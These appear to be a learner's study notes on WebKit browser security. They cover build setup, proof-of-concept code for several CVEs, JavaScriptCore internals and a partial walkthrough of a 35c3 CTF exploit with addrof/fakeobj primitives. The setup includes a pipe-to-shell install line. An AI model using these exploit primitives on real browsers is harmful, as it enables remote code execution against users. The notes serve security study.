Okay, binary security is not only about the heap and the stack; there is still a lot to discover beyond regular CTF challenges. Browsers, virtual machines, and kernels all play an important role in binary security, and I decided to study browsers first. I chose a relatively easy one: WebKit. (ChakraCore might be easier, LoL, but there's a rumor that Microsoft is canceling the project, so I decided not to choose it.) I will write a series of posts to record my notes from studying WebKit security. This is also my first time learning browser security, so my posts will probably contain lots of mistakes. If you notice any, don't hesitate to contact me with corrections.
Before reading, you should be familiar with: C++ syntax; assembly language syntax; installing a virtual machine; Ubuntu and its command line; basic compiler theory concepts.

Setup
Okay, let’s start now.

Virtual Machine
First, we need to install a VM as our testing target. Here, I chose Ubuntu 18.04 LTS and Ubuntu 16.04 LTS as the target hosts. You can download here. If I don’t specify the version, please use 18.04 LTS as the default. A Mac might be a more appropriate choice since it has Xcode and Safari, but considering macOS’s high resource consumption and unstable updates, I would rather use Ubuntu. We also need VM software. I prefer VMware; Parallels Desktop and VirtualBox (free) are also fine, depending on personal preference. I won’t walk through installing Ubuntu on VMware step by step. However, I do need to remind you to allocate as much memory and as many CPUs as possible, because compilation consumes a huge amount of resources. An 80GB disk should be enough to store the source code and compiled files.

Source Code
You can download the WebKit source code in three ways: git, svn, and archive. WebKit’s default version control system is svn, but I chose git (I’m too unfamiliar with svn):
git clone git://git.webkit.org/WebKit.git WebKit

Debugger and Editor
An IDE consumes lots of resources, so I use vim to edit source code. Most debugging write-ups I have seen use lldb, which I am not familiar with. Therefore, I also install gdb with the gef plugin:
sudo apt install vim gdb lldb
wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh

Test
Compiling JavaScriptCore
Compiling full WebKit takes a large amount of time. For now we only compile JSC (JavaScriptCore), where most vulnerabilities come from. You should now be in the root directory of the WebKit source code. Run this to prepare dependencies:
Tools/gtk/install-dependencies
Even though we are not compiling full WebKit yet, you can install the remaining dependencies first for future testing.
This step is not required for compiling JSC, so skip it if you don’t want to spend too much time:
Tools/Scripts/update-webkitgtk-libs
After that, we can compile JSC:
Tools/Scripts/build-webkit --jsc-only
A couple of minutes later, we can run JSC with:
WebKitBuild/Release/bin/jsc
Let’s do some tests:
>>> 1+1
2
>>> var obj = {a:1, b:"test"}
undefined
>>> JSON.stringify(obj)
{"a":1,"b":"test"}

Triggering Bugs
(Ubuntu 18.04 LTS is used here.) We use CVE-2018-4416 for testing. Here is the PoC; save it as poc.js in the same folder as jsc:
function gc() {
    for (let i = 0; i < 10; i++) {
        let ab = new ArrayBuffer(1024 * 1024 * 10);
    }
}
function opt(obj) {
    // Starting the optimization.
    for (let i = 0; i < 500; i++) { }
    let tmp = {a: 1};
    gc();
    tmp.__proto__ = {};
    for (let k in tmp) { // The structure ID of "tmp" is stored in a JSPropertyNameEnumerator.
        tmp.__proto__ = {};
        gc();
        obj.__proto__ = {}; // The structure ID of "obj" equals to tmp's.
        return obj[k]; // Type confusion.
    }
}
opt({});
let fake_object_memory = new Uint32Array(100);
fake_object_memory[0] = 0x1234;
let fake_object = opt(fake_object_memory);
print(fake_object);

First, switch to the vulnerable version:
git checkout -b CVE-2018-4416 034abace7ab
This may take even longer than compiling. Run ./jsc poc.js, and we get:
ASSERTION FAILED: structureID < m_capacity
../../Source/JavaScriptCore/runtime/StructureIDTable.h(129) : JSC::Structure* JSC::StructureIDTable::get(JSC::StructureID)
1 0x7f055ef18c3c WTFReportBacktrace
2 0x7f055ef18eb4 WTFCrash
3 0x7f055ef18ec4 WTFIsDebuggerAttached
4 0x5624a900451c JSC::StructureIDTable::get(unsigned int)
5 0x7f055e86f146 bool JSC::JSObject::getPropertySlot<true>(JSC::ExecState*, JSC::PropertyName, JSC::PropertySlot&)
6 0x7f055e85cf64
7 0x7f055e846693 JSC::JSObject::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const
8 0x7f055e7476bb JSC::JSCell::toPrimitive(JSC::ExecState*, JSC::PreferredPrimitiveType) const
9 0x7f055e745ac8 JSC::JSValue::toStringSlowCase(JSC::ExecState*, bool) const
10 0x5624a900b3f1 JSC::JSValue::toString(JSC::ExecState*) const
11 0x5624a8fcc3a9
12 0x5624a8fcc70c
13 0x7f05131fe177
Illegal instruction (core dumped)

If we run this on the latest version (git checkout master to switch back, and delete the build output with rm -rf WebKitBuild/Release/* and rm -rf WebKitBuild/Debug/*):
./jsc poc.js
WARNING: ASAN interferes with JSC signal handlers; useWebAssemblyFastMemory will be disabled.
OK
undefined
=================================================================
==96575==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 96 byte(s) in 3 object(s) allocated from:
#0 0x7fe1f579e458 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0458)
#1 0x7fe1f2db7cc8 in __gnu_cxx::new_allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> >::allocate(unsigned long, void const*) (/home/browserbox/WebKit/WebKitBuild/Debug/lib/libJavaScriptCore.so.1+0x5876cc8)
#2 0x7fe1f2db7a7a in std::allocator_traits<std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, (__gnu_cxx::_Lock_policy)2>::_Deleter<std::allocator<std::mutex> >, std::allocator<std::mutex>, (__gnu_cxx::_Lock_policy)2> > >::allocate(std::allocator<std::_Sp_counted_deleter<std::mutex*, std::__shared_ptr<std::mutex, ...
// lots of error message
SUMMARY: AddressSanitizer: 216 byte(s) leaked in 6 allocation(s).

Now we have succeeded in triggering a bug! I am not going to explain the details (I don’t know them yet either). Hopefully we can figure out the root cause in a few weeks.

Understanding WebKit Vulnerability
Now it’s time to discuss something deeper. Before we talk about the WebKit architecture, let’s go over the common bug classes in WebKit. Here, I only discuss binary-level bugs. Higher-level bugs, like URL spoofing or UXSS, are not our topic. The examples below are not only from WebKit; some are Chrome bugs.
I will introduce them briefly here and analyze the PoCs in detail later. Before reading this part, you are strongly recommended to read some material on compiler theory, and basic pwn knowledge is also needed. My explanations may not be entirely clear; again, please correct my mistakes if you find any. This post will be updated several times as my understanding of JSC deepens, so don’t forget to check back later.

1. Use After Free
A.k.a. UAF. This is common in CTF challenges. A classic scenario:
char* a = malloc(0x100);
free(a);
printf("%s", a);
Because of a logic error, the code reuses freed memory. Usually, we can leak or write data once we control the freed memory. CVE-2017-13791 is an example of a WebKit UAF. Here is the PoC:
<script>
function jsfuzzer() {
    textarea1.setRangeText("foo");
    textarea2.autofocus = true;
    textarea1.name = "foo";
    form.insertBefore(textarea2, form.firstChild);
    form.submit();
}
function eventhandler2() {
    for(var i=0;i<100;i++) {
        var e = document.createElement("input");
        form.appendChild(e);
    }
}
</script>
<body onload=jsfuzzer()>
<form id="form" onchange="eventhandler2()">
<textarea id="textarea1">a</textarea>
<object id="object"></object>
<textarea id="textarea2">b</textarea>

2. Out of Bound
A.k.a. OOB. It is the browser counterpart of a buffer overflow: we can read or write nearby memory. OOB frequently results from an incorrect optimization of array accesses or an insufficient bounds check. For example (CVE-2017-2447):
var ba;
function s(){ ba = this; }
function dummy(){ alert("just a function"); }
Object.defineProperty(Array.prototype, "0", {set : s });
var f = dummy.bind({}, 1, 2, 3, 4);
ba.length = 100000;
f(1, 2, 3);
When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array.
Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn’t altered) and reads out of bounds.
In most cases, we cannot directly overwrite the $RIP register. Exploit writers usually craft a fake array to turn partial R/W into arbitrary R/W.

3. Type Confusion
This is a special kind of vulnerability that occurs in applications containing a compiler, and it is slightly difficult to explain. Imagine we have the following object (32-bit):
struct example{ int length; char *content; };
Then, if an object with length == 5 and a content pointer is in memory, it probably looks like this:
0x00: 0x00000005 -> length
0x04: 0xdeadbeef -> pointer
Now suppose we have another object:
struct exploit{ int length; void (*exp)(); };
If we can force the compiled code to treat an example object as an exploit object, content is interpreted as the function pointer exp, so we can point exp at an arbitrary address and achieve RCE. An example of type confusion:
var q;
function g(){ q = g.caller; return 7; }
var a = [1, 2, 3];
a.length = 4;
Object.defineProperty(Array.prototype, "3", {get : g});
[4, 5, 6].concat(a);
q(0x77777777, 0x77777777, 0);
Cited from CVE-2017-2446: If a builtin script in webkit is in strict mode, but then calls a function that is not strict, this function is allowed to call Function.caller and can obtain a reference to the strict function.

4. Integer Overflow
Integer overflow is also common in CTFs. Although an integer overflow by itself cannot lead to RCE, it often leads to OOB. This bug is not difficult to understand. Imagine you are running the code below on a 32-bit machine:
mov eax, 0xffffffff
add eax, 2
The maximum value of eax is 0xffffffff, so it cannot hold 0xffffffff + 2 = 0x100000001. The bit above bit 31 is discarded, and the final value of eax is 0x00000001. This is an example from WebKit (CVE-2017-2536):
var a = new Array(0x7fffffff);
var x = [13, 37, ...a, ...a];
The length is not checked correctly, so spreading the array into a new one overflows the computed length. We can then use the resulting array for OOB access.

5. Else
Some bugs are difficult to categorize: race conditions, unallocated memory, … I will explain them in detail later.

JavaScriptCore in Depth
WebKit primarily includes:
JavaScriptCore: the JavaScript execution engine.
WTF: Web Template Framework, a replacement for the C++ STL. It provides string operations, smart pointers, etc. Its heap handling is also unique.
DumpRenderTree: produces the render tree.
WebCore: the most complicated part. It contains CSS, DOM, HTML, rendering, etc.: almost every part of the browser besides the components mentioned above.

And JSC has:
lexer
parser
start-up interpreter (LLInt)
three JavaScript JIT compilers, each taking longer to compile but producing faster code than the last:
    baseline JIT, the initial JIT
    a low-latency optimizing JIT (DFG)
    a high-throughput optimizing JIT (FTL), the final phase of JIT
two WebAssembly execution engines:
    BBQ
    OMG

Again, a disclaimer: this post might be inaccurate or wrong in explaining WebKit mechanisms.

If you have taken a basic compiler theory course, the lexer and parser work just as taught in class. But the code generation part is frustrating. It has one interpreter and three compilers, WTF? JSC also has many other unconventional features. Let’s have a look:

JSC Value Representation
To make them easy to tell apart, JSC encodes each kind of value differently:
pointer: 0000:PPPP:PPPP:PPPP (begins with 0000, followed by the address)
double (top 16 bits range from 0001 to FFFE): 0001:****:****:**** to FFFE:****:****:****
integer: FFFF:0000:IIII:IIII (IIII:IIII stores the value)
false: 0x06
true: 0x07
undefined: 0x0a
null: 0x02
0x0, however, is not a valid value and can lead to a crash.

JSC Object Model
Unlike Java, where class members are fixed, JavaScript allows properties to be added at any time.
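To make "properties can be added at any time" concrete, here is a minimal sketch. The object and variable names are arbitrary and nothing in it is specific to JSC; it only shows that the set of properties on one object changes while the program runs, which is exactly what an engine's object layout has to cope with.

```javascript
// Illustrative only: names are arbitrary, behavior is standard JavaScript.
var o = {f: 5, g: 6};                  // two properties known at creation time
var keysAtCreation = Object.keys(o);   // snapshot of the property names

o.h = 7;                               // a property added later, at runtime
var keysAfterAdd = Object.keys(o);

delete o.f;                            // properties can also disappear again
var keysAfterDelete = Object.keys(o);

console.log(keysAtCreation, keysAfterAdd, keysAfterDelete);
```

The same object ends up with three different shapes over its lifetime, so a fixed, compile-time field layout as in Java is not enough.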
So, despite traditionally statically align properties, JSC has a butterfly pointer for adding dynamic properties. It’s like an additional array. Let’s explain it in several situations. Also, JSArray will always be allocated to butterfly pointer since they change dynamically. We can understand the concept easily with the following graph: 0x0 Fast JSObject The properties are initialized: var o = {f: 5, g: 6}; The butterfly pointer will be null here since we only have static properties: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | NULL | --> Butterfly Pointer -------------- | 0xffff000 | --> 5 in JS format | 000000005 | -------------- | 0xffff000 | | 000000006 | --> 6 in JS format -------------- Let’s expand our knowledge of JSObject. As we see, each structure ID has a matched structure table. Inside the table, it contains the property names and their offsets. In our previous object o, the table looks like: property name location “f” inline(0) “g” inline(1) When we want to retrieve a value(e.g. var v = o.f), following behaviors will happen: if (o->structureID == 42) v = o->inlineStorage[0] else v = slowGet(o, “f”) You might wonder why the compiler will directly retrieve the value via offset when knowing the ID is 42. This is a mechanism called inline caching, which helps us to get value faster. We won’t talk about this much, click here for more details. 0x1 JSObject with dynamically added fields var o = {f: 5, g: 6}; o.h = 7; Now, the butterfly has a slot, which is 7. -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000007 | | 000000005 | | ------------- -------------- -> | ... 
| | 0xffff000 | | 000000006 | -------------- 0x2 JSArray with room for 3 array elements var a = []; The butterfly initializes an array with estimated size. The first element 0 means a number of used slots. And 3 means the max slots: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0 | | ------------- (8 bits for these two elements) | | 3 | -> ------------- | <hole> | ------------- | <hole> | ------------- | <hole> | ------------- 0x3 Object with fast properties and array elements var o = {f: 5, g: 6}; o[0] = 7; We filled an element of the array, so 0(used slots) increases to 1 now: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000005 | | | 3 | -------------- -> ------------- | 0xffff000 | | 0xffff000 | | 000000006 | | 000000007 | -------------- ------------- | <hole> | ------------- | <hole> | ------------- 0x4 Object with fast and dynamic properties and array elements var o = {f: 5, g: 6}; o[0] = 7; o.h = 8; The new member will be appended before the pointer address. 
Arrays are placed on the right and attributes are on the left of butterfly pointer, just like the wing of a butterfly: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | 0xffff000 | | | 000000008 | | 000000005 | | ------------- -------------- | | 1 | | 0xffff000 | | ------------- | 000000006 | | | 2 | -------------- -> ------------- (pointer address) | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- 0x5 Exotic object with dynamic properties and array elements var o = new Date(); o[0] = 7; o.h = 8; We extend the butterfly with a built-in class, the static properties will not change: -------------- |structure ID| -------------- | indexing | -------------- | type | -------------- | flags | -------------- | call state | -------------- | butterfly | -| ------------- -------------- | | 0xffff000 | | < C++ | | | 000000008 | | State > | -> ------------- -------------- | 1 | | < C++ | ------------- | State > | | 2 | -------------- ------------- | 0xffff000 | | 000000007 | ------------- | <hole> | ------------- Type Inference JavaScript is a weak, dynamic type language. The compiler will do a lot of works in type inference, causing it becomes extremely complicated. Watchpoints Watchpoints can happen in the following cases: haveABadTime Structure transition InferredValue InferredType and many others… When above situations happen, it will check whether watchpoint has optimized. In WebKit, it represents like this: class Watchpoint { public: virtual void fire() = 0; }; For example, the compiler wants to optimize 42.toString() to "42" (return directly rather than use code to convert), it will check if it’s already invalidated. Then, If valid, register watchpoint and do the optimization. Compilers 0x0. LLInt At the very beginning, the interpreter will generate byte code template. 
Use JVM as an example, to executes .class file, which is another kind of byte code template. Byte code helps to execute easier: parser -> bytecompiler -> generatorfication -> bytecode linker -> LLInt 0x1. Baseline JIT and Byte Code Template Most basic JIT, it will generate byte code template here. For example, this is add in javascript: function foo(a, b) { return a + b; } This is bytecode IL, which is more straightforward without sophisticated lexes and more convenient to convert to asm: [ 0] enter [ 1] get_scope loc3 [ 3] mov loc4, loc3 [ 6] check_traps [ 7] add loc6, arg1, arg2 [12] ret loc6 Code segment 7 and 12 can result following DFG IL (which we talk next). we can notice that it has many type related information when operating. In line 4, the code will check if the returning type matches: GetLocal(Untyped:@1, arg1(B<Int32>/FlushedInt32), R:Stack(6), bc#7); GetLocal(Untyped:@2, arg2(C<BoolInt32>/FlushedInt32), R:Stack(7), bc#7); ArithAdd(Int32:@23, Int32:@24, CheckOverflow, Exits, bc#7); MovHint(Untyped:@25, loc6, W:SideState, ClobbersExit, bc#7, ExitInvalid); Return(Untyped:@25, W:SideState, Exits, bc#12); The AST looks like this: +----------+ | return | +----+-----+ | | +----+-----+ | add | +----------+ | | | | v v +--+---+ +-+----+ | arg1 | | arg2 | +------+ +------+ 0x2. DFG If JSC detects a function running a few times. It will go to the next phase. The first phase has already generated byte code. So, DFG parser parses byte code directly, which it’s less abstract and easier to parse. Then, DFG will optimize and generate code: DFG bytecode parser -> DFG optimizer -> DFG Backend In this step, the code runs many times; and they type is relatively constant. Type check will use OSR. Imagine we will optimize from this: int foo(int* ptr) { int w, x, y, z; w = ... // lots of stuff x = is_ok(ptr) ? *ptr : slow_path(ptr); y = ... // lots of stuff z = is_ok(ptr) ? *ptr : slow_path(ptr); return w + x + y + z; } to this: int foo(int* ptr) { int w, x, y, z; w = ... 
// lots of stuff
if (!is_ok(ptr)) return foo_base1(ptr, w);
x = *ptr;
y = ... // lots of stuff
z = *ptr;
return w + x + y + z;
}
The code runs faster because ptr is type-checked only once. If the type of ptr keeps changing, the optimized code runs slower because of frequent bailouts. Thus, the browser only uses OSR to optimize code once it has run thousands of times.

0x3. FTL
If a function runs hundreds or thousands of times, the JIT will use FTL. Like DFG, FTL reuses the bytecode template, but with deeper optimization:
DFG bytecode parser -> DFG optimizer -> DFG-to-B3 lowering -> B3 Optimizer -> Instruction Selection -> Air Optimizer -> Air Backend

0x4. More About Optimization
Let’s have a look at how the IR changes across the optimization phases:
IR | Style | Example
Bytecode | High Level Load/Store | bitor dst, left, right
DFG | Medium Level Exotic SSA | dst: BitOr(Int32:@left, Int32:@right, ...)
B3 | Low Level Normal SSA | Int32 @dst = BitOr(@left, @right)
Air | Architectural CISC | Or32 %src, %dest
Type checks are gradually eliminated, which may help you understand why there are so many type confusion CVEs in browsers. In addition, each IR is closer to machine code than the one before. Once a type check fails, execution returns to the previous tier (e.g. if a type check fails in the B3 stage, execution falls back to DFG and continues there).

Garbage Collector (TODO)
The heap of JSC is based on GC. The objects in the heap have a counter for their references. The GC scans the heap to collect memory that is no longer in use. …still, need more materials…

Writing Exploitation
Before we start exploiting bugs, we should look at how difficult it is to write an exploit. We focus on writing the exploit code here; the details of the vulnerability will not be covered in depth. This challenge is WebKid from 35c3 CTF. You can get the compiled WebKit binary (with instructions), a prepared VM, and the exploit code here.
Also, a macOS Mojave (10.14.2) should be prepared in VM or real machine (I think it won’t affect crashes in different versions of macOS, but the attack primitive might be different). Run via this command: DYLD_LIBRARY_PATH=/Path/to/WebKid DYLD_FRAMEWORK_PATH=/Path/to/WebKid /Path/to/WebKid/MiniBrowser.app/Contents/MacOS/MiniBrowser Remember to use FULL PATH. Otherwise, the browser will crash If running on a local machine, remember to create /flag1 for testing. Analyzing Let’s look at the patch: diff --git a/Source/JavaScriptCore/runtime/JSObject.cpp b/Source/JavaScriptCore/runtime/JSObject.cpp index 20fcd4032ce..a75e4ef47ba 100644 --- a/Source/JavaScriptCore/runtime/JSObject.cpp +++ b/Source/JavaScriptCore/runtime/JSObject.cpp @@ -1920,6 +1920,31 @@ bool JSObject::hasPropertyGeneric(ExecState* exec, unsigned propertyName, Proper return const_cast<JSObject*>(this)->getPropertySlot(exec, propertyName, slot); } +static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) +{ + ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); + + Structure* previous = structure->previousID(); + if (!previous) + return false; + + unsigned unused; + bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); + if (!isLastAddedProperty) + return false; + + RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); + + if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { + ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); + thisObject->setButterfly(vm, nullptr); + } + + thisObject->setStructure(vm, previous); + + return true; +} + // ECMA 8.6.2.5 bool JSObject::deleteProperty(JSCell* cell, ExecState* exec, PropertyName propertyName) { @@ -1946,18 +1971,21 @@ bool JSObject::deleteProperty(JSCell* cell, 
ExecState* exec, PropertyName proper Structure* structure = thisObject->structure(vm); - bool propertyIsPresent = isValidOffset(structure->get(vm, propertyName, attributes)); + PropertyOffset offset = structure->get(vm, propertyName, attributes); + bool propertyIsPresent = isValidOffset(offset); if (propertyIsPresent) { if (attributes & PropertyAttribute::DontDelete && vm.deletePropertyMode() != VM::DeletePropertyMode::IgnoreConfigurable) return false; - PropertyOffset offset; - if (structure->isUncacheableDictionary()) + if (structure->isUncacheableDictionary()) { offset = structure->removePropertyWithoutTransition(vm, propertyName, [] (const ConcurrentJSLocker&, PropertyOffset) { }); - else - thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } else { + if (!tryDeletePropertyQuickly(vm, thisObject, structure, propertyName, attributes, offset)) { + thisObject->setStructure(vm, Structure::removePropertyTransition(vm, structure, propertyName, offset)); + } + } - if (offset != invalidOffset) + if (offset != invalidOffset && (!isOutOfLineOffset(offset) || thisObject->butterfly())) thisObject->locationForOffset(offset)->clear(); } diff --git a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in index 536481ecd6a..62189fea227 100644 --- a/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in +++ b/Source/WebKit/WebProcess/com.apple.WebProcess.sb.in @@ -25,6 +25,12 @@ (deny default (with partial-symbolication)) (allow system-audit file-read-metadata) +(allow file-read* (literal "/flag1")) + +(allow mach-lookup (global-name "net.saelo.shelld")) +(allow mach-lookup (global-name "net.saelo.capsd")) +(allow mach-lookup (global-name "net.saelo.capsd.xpc")) + #if PLATFORM(MAC) && __MAC_OS_X_VERSION_MIN_REQUIRED < 101300 (import "system.sb") #else The biggest problem here is about tryDeletePropertyQuickly function, which acted like this (comment provided from Linus Henze: 
static bool tryDeletePropertyQuickly(VM& vm, JSObject* thisObject, Structure* structure, PropertyName propertyName, unsigned attributes, PropertyOffset offset) { // This assert will always be true as long as we're not passing an "invalid" offset ASSERT(isInlineOffset(offset) || isOutOfLineOffset(offset)); // Try to get the previous structure of this object Structure* previous = structure->previousID(); if (!previous) return false; // If it has none, stop here unsigned unused; // Check if the property we're deleting is the last one we added // This must be the case if the old structure doesn't have this property bool isLastAddedProperty = !isValidOffset(previous->get(vm, propertyName, unused)); if (!isLastAddedProperty) return false; // Not the last property? Stop here and remove it using the normal way. // Assert that adding the property to the last structure would result in getting the current structure RELEASE_ASSERT(Structure::addPropertyTransition(vm, previous, propertyName, attributes, offset) == structure); // Uninteresting. Basically, this just deletes this objects Butterfly if it's not an array and we're asked to delete the last out-of-line property. The Butterfly then becomes useless because no property is stored in it, so we can delete it. if (offset == firstOutOfLineOffset && !structure->hasIndexingHeader(thisObject)) { ASSERT(!previous->hasIndexingHeader(thisObject) && structure->outOfLineCapacity() > 0 && previous->outOfLineCapacity() == 0); thisObject->setButterfly(vm, nullptr); } // Directly set the structure of this object thisObject->setStructure(vm, previous); return true; } In short, one object will fall back to previous structure ID by deleting an object added previously. For example: var o = [1.1, 2.2, 3.3, 4.4]; // o is now an object with structure ID 122. o.property = 42; // o is now an object with structure ID 123. 
// The structure is a leaf (has never transitioned).
function helper() { return o[0]; }
jitCompile(helper); // Run the helper function many times
// In this case, the JIT compiler will choose to use a watchpoint instead of runtime checks
// when compiling the helper function. As such, it watches structure 123 for transitions.
delete o.property;
// o now "went back" to structure ID 122. The watchpoint was not fired.

Let's review some background first. In JSC, both runtime type checks and watchpoints are used to keep type assumptions correct. After a function has run many times, JSC stops emitting the structure check and relies on a watchpoint instead. When the object is modified, the engine should fire the watchpoint so that execution falls back to the interpreter and new JIT code is generated. Here, restoring the previous structure ID does not fire the watchpoint even though the structure has changed, which means the layout of the data behind the butterfly pointer can change as well. The JIT code generated for helper does not fall back because the watchpoint was never triggered, and this leads to type confusion: the JIT code still accesses the butterfly using the old layout. We can use this to leak addresses and create fake objects. This is the minimum attack primitive:

haxxArray = [13.37, 73.31];
haxxArray.newProperty = 1337;
function returnElem() { return haxxArray[0]; }
function setElem(obj) { haxxArray[0] = obj; }
for (var i = 0; i < 100000; i++) {
    returnElem();
    setElem(13.37);
}
delete haxxArray.newProperty;
haxxArray[0] = {};
function addrof(obj) { haxxArray[0] = obj; return returnElem(); }
function fakeobj(address) { setElem(address); return haxxArray[0]; }
// The JIT code treats the element as a double, but it is actually an object pointer.
// We can leak the address from it.
print(addrof({}));
// Almost the same as above, but used for writing data.
print(fakeobj(addrof({})));

Utility Functions

The exploit script creates many utility functions. They help us build the primitives you need in almost every WebKit exploit.
We will only look at some important functions.

Getting Native Code

To attack, we need a function compiled to native code so that we can overwrite it with shellcode or use it for ROP. A function only becomes native code after it has run many times (this one is in pwn.js):

function jitCompile(f, ...args) {
    for (var i = 0; i < ITERATIONS; i++) {
        f(...args);
    }
}

function makeJITCompiledFunction() {
    // Some code that can be overwritten by the shellcode.
    function target(num) {
        for (var i = 2; i < num; i++) {
            if (num % i === 0) {
                return false;
            }
        }
        return true;
    }
    jitCompile(target, 123);
    return target;
}

Controlling Bytes

In int64.js, we craft a class Int64. It uses a Uint8Array to store the number and implements related operations such as add and sub. In the previous chapter, we mentioned that JavaScript uses tagged values to represent numbers, which means that you cannot control the upper bytes. A Uint8Array holds 8-bit unsigned integers just like native values, allowing us to control all 8 bytes. Simple example usage of Uint8Array:

var x = new Uint8Array([17, -45.3]);
var y = new Uint8Array(x);
console.log(x[0]); // 17
console.log(x[1]); // the value is converted to an 8-bit unsigned integer: 211

The bytes can also be viewed as an array of 16-bit values. The following shows clearly that Uint8Array stores data in native (little-endian) form, because 0x0201 == 513:

a = new Uint8Array([1,2,3,4])
b = new Uint16Array(a.buffer)
// Uint16Array [513, 1027]

The remaining functions of Int64 simulate different arithmetic operations. You can infer their implementations from their names and comments, and the code is easy to read too.
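To make the idea of simulating arithmetic on raw bytes concrete, here is a minimal sketch of a byte-wise 64-bit addition with carry. It is not the actual code from int64.js: the helper names addBytes and toHex are hypothetical, and the sketch assumes 8-byte little-endian arrays as described above.

```javascript
// Hypothetical helpers for illustration; not taken from int64.js.

// Add two 64-bit values stored as 8-byte little-endian Uint8Arrays.
function addBytes(a, b) {
    var out = new Uint8Array(8);
    var carry = 0;
    for (var i = 0; i < 8; i++) {
        var sum = a[i] + b[i] + carry;
        out[i] = sum & 0xff;           // keep the low 8 bits
        carry = sum > 0xff ? 1 : 0;    // propagate overflow to the next byte
    }
    return out;                        // a carry out of byte 7 is dropped
}

// Format the bytes with the most significant byte first.
function toHex(bytes) {
    var s = "";
    for (var i = 7; i >= 0; i--) {
        s += ("0" + bytes[i].toString(16)).slice(-2);
    }
    return "0x" + s;
}

var addr = new Uint8Array([0xf0, 0xff, 0xff, 0xff, 0, 0, 0, 0]); // 0x00000000fffffff0
var off = new Uint8Array([0x10, 0, 0, 0, 0, 0, 0, 0]);           // 0x10
var sumHex = toHex(addBytes(addr, off));
```

Working on bytes like this sidesteps the precision limit of JavaScript numbers, which is why an address plus a small offset can be computed exactly even when it does not fit in a 32-bit integer.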
Writing Exploit Detail about the Script I add some comments from Saelo’s original writeup(most comments are still his work, great thanks!): const ITERATIONS = 100000; // A helper function returns function with native code function jitCompile(f, ...args) { for (var i = 0; i < ITERATIONS; i++) { f(...args); } } jitCompile(function dummy() { return 42; }); // Return a function with native code, we will palce shellcode in this function later function makeJITCompiledFunction() { // Some code that can be overwritten by the shellcode. function target(num) { for (var i = 2; i < num; i++) { if (num % i === 0) { return false; } } return true; } jitCompile(target, 123); return target; } function setup_addrof() { var o = [1.1, 2.2, 3.3, 4.4]; o.addrof_property = 42; // JIT compiler will install a watchpoint to discard the // compiled code if the structure of |o| ever transitions // (a heuristic for |o| being modified). As such, there // won't be runtime checks in the generated code. function helper() { return o[0]; } jitCompile(helper); // This will take the newly added fast-path, changing the structure // of |o| without the JIT code being deoptimized (because the structure // of |o| didn't transition, |o| went "back" to an existing structure). delete o.addrof_property; // Now we are free to modify the structure of |o| any way we like, // the JIT compiler won't notice (it's watching a now unrelated structure). o[0] = {}; return function(obj) { o[0] = obj; return Int64.fromDouble(helper()); }; } function setup_fakeobj() { var o = [1.1, 2.2, 3.3, 4.4]; o.fakeobj_property = 42; // Same as above, but write instead of reading from the array. function helper(addr) { o[0] = addr; } jitCompile(helper, 13.37); delete o.fakeobj_property; o[0] = {}; return function(addr) { helper(addr.asDouble()); return o[0]; }; } function pwn() { var addrof = setup_addrof(); var fakeobj = setup_fakeobj(); // verify basic exploit primitives work. 
var addr = addrof({p: 0x1337}); assert(fakeobj(addr).p == 0x1337, "addrof and/or fakeobj does not work"); print('[+] exploit primitives working'); // from saelo: spray structures to be able to predict their IDs. // from Auxy: I am not sure about why spraying. i change the code to: // // var structs = [] // var i = 0; // var abc = [13.37]; // abc.pointer = 1234; // abc['prop' + i] = 13.37; // structs.push(abc); // var victim = structs[0]; // // and the payload still work stablely. It seems this action is redundant var structs = [] for (var i = 0; i < 0x1000; ++i) { var array = [13.37]; array.pointer = 1234; array['prop' + i] = 13.37; structs.push(array); } // take an array from somewhere in the middle so it is preceeded by non-null bytes which // will later be treated as the butterfly length. var victim = structs[0x800]; print(`[+] victim @ ${addrof(victim)}`); // craft a fake object to modify victim var flags_double_array = new Int64("0x0108200700001000").asJSValue(); var container = { header: flags_double_array, butterfly: victim }; // create object having |victim| as butterfly. var containerAddr = addrof(container); print(`[+] container @ ${containerAddr}`); // add the offset to let compiler recognize fake structure var hax = fakeobj(Add(containerAddr, 0x10)); // origButterfly is now based on the offset of **victim** // because it becomes the new butterfly pointer // and hax[1] === victim.pointer var origButterfly = hax[1]; var memory = { addrof: addrof, fakeobj: fakeobj, // Write an int64 to the given address. 